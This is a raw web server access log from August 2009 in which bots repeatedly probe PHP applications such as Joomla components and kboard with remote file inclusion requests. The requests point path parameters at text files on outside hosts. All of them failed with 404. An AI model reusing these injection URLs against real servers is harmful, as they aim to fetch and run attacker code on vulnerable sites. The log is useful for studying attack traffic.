65.55.208.120 - - [16/Aug/2009:02:28:12 -0500] "GET /logs/access_log.1201392000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [16/Aug/2009:02:28:14 -0500] "GET /logs/access_log.1185840000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [16/Aug/2009:02:28:16 -0500] "GET /logs/access_log.1215561600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
198.145.43.142 - - [16/Aug/2009:02:30:32 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
198.145.43.142 - - [16/Aug/2009:02:30:32 -0500] "GET /logs/access_log.1243036800/components/com_performs/performs.php?mosConfig_absolute_path=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
198.145.43.142 - - [16/Aug/2009:02:30:32 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:31:35 -0500] "GET /logs/access_log.1241481600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:02:32:10 -0500] "GET /logs/access_log.1229817600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
116.122.158.207 - - [16/Aug/2009:02:34:49 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:02:34:52 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:02:34:53 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.192.127.213 - - [16/Aug/2009:02:34:53 -0500] "GET /logs/become_editor.php?theme_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
67.192.127.213 - - [16/Aug/2009:02:34:53 -0500] "GET /become_editor.php?theme_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
195.225.168.186 - - [16/Aug/2009:02:35:40 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:35:43 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:35:43 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:35:43 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:40 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:40 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:40 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:40 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:59 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:59 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:59 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:36:59 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:37:30 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:37:30 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:37:30 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:02:37:30 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.207.132 - - [16/Aug/2009:02:40:22 -0500] "GET /logs/access_log.1164326400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.90.142.117 - - [16/Aug/2009:02:40:47 -0500] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
189.90.142.117 - - [16/Aug/2009:02:40:47 -0500] "GET /logs/access_log.1241049600%20//include/scripts/export_batch.inc.php?DIR=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
189.90.142.117 - - [16/Aug/2009:02:40:47 -0500] "GET //include/scripts/export_batch.inc.php?DIR=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
78.110.50.127 - - [16/Aug/2009:02:43:58 -0500] "GET //kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:02:43:58 -0500] "GET /logs//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:02:43:59 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:02:44:02 -0500] "GET //kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:02:44:02 -0500] "GET /logs//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:02:44:02 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:02:44:21 -0500] "GET /logs/access_log.1233532800//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:02:44:21 -0500] "GET /logs/access_log.1230508800//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:02:44:24 -0500] "GET //kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:02:44:24 -0500] "GET /logs//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:02:44:24 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.90.142.117 - - [16/Aug/2009:02:44:41 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
189.90.142.117 - - [16/Aug/2009:02:44:42 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
189.90.142.117 - - [16/Aug/2009:02:44:42 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
69.64.34.67 - - [16/Aug/2009:02:44:46 -0500] "GET /logs/access_log.1228608000%20%20//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:02:45:00 -0500] "GET /logs/access_log.1228608000%20%20//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.202.2.220 - - [16/Aug/2009:02:45:47 -0500] "GET /logs/access_log.1243382400%22%20target=%22_blank/akocomments.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.202.2.220 - - [16/Aug/2009:02:45:47 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.202.2.220 - - [16/Aug/2009:02:45:47 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.50.10.35 - - [16/Aug/2009:02:46:10 -0500] "GET /logs//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.202.2.220 - - [16/Aug/2009:02:47:57 -0500] "GET /logs/access_log.1242172800%22%20target=%22_blank/akocomments.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.50.10.35 - - [16/Aug/2009:02:48:52 -0500] "GET /logs/access_log.1241049600//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.50.10.35 - - [16/Aug/2009:02:49:10 -0500] "GET /logs/access_log.1228608000%20%20//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:38 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:39 -0500] "GET /logs/access_log.1243382400/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:39 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:41 -0500] "GET /logs/access_log.1247788800/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:48 -0500] "GET /logs/access_log.1243382400/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:48 -0500] "GET /logs/access_log.1247788800/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:49 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:52:49 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:02:53:09 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:53:12 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:53:12 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:53:12 -0500] "GET /logs/access_log.1247788800/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:02:53:15 -0500] "GET /logs/access_log.1243382400/akocomments.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.55.106.109 - - [16/Aug/2009:02:53:16 -0500] "GET /logs/access_log.1246492800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.135.55.136 - - [16/Aug/2009:02:53:17 -0500] "GET /logs/access_log.1236038400//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:53:52 -0500] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:53:52 -0500] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:53:52 -0500] "GET /logs/access_log.1242086400/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:53:58 -0500] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:53:58 -0500] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:53:58 -0500] "GET /logs/access_log.1242086400/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:54:06 -0500] "GET /logs/access_log.1245801600/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:54:18 -0500] "GET /logs/access_log.1245801600/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:02:55:00 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:02:55:00 -0500] "GET /logs/access_log.1244764800/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
203.236.100.30 - - [16/Aug/2009:02:55:00 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:02:56:26 -0500] "GET /logs/access_log.1241049600//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:02:57:22 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:02:57:31 -0500] "GET /logs/access_log.1236038400//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:02:57:40 -0500] "GET /logs/access_log.1232755200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
208.97.167.21 - - [16/Aug/2009:02:58:29 -0500] "GET //classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:58:29 -0500] "GET /logs//classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:58:29 -0500] "GET /logs/access_log.1247097600//classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:58:35 -0500] "GET /logs/access_log.1238112000//classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:59:03 -0500] "GET /logs//classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:59:03 -0500] "GET /logs/access_log.1247097600//classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:59:03 -0500] "GET //classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:02:59:03 -0500] "GET /logs/access_log.1238112000//classes.php?LOCAL_PATH=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:03:00:09 -0500] "GET /logs/access_log.1241049600//kboard/kboard.php?board=contents1_05&act=view&no=81&page=7&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:03:02:47 -0500] "GET /logs/access_log.1232755200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
74.50.10.35 - - [16/Aug/2009:03:03:53 -0500] "GET /logs/access_log.1232755200//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
69.73.159.26 - - [16/Aug/2009:03:04:24 -0500] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:03:04:24 -0500] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:03:04:24 -0500] "GET /logs/access_log.1242086400/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
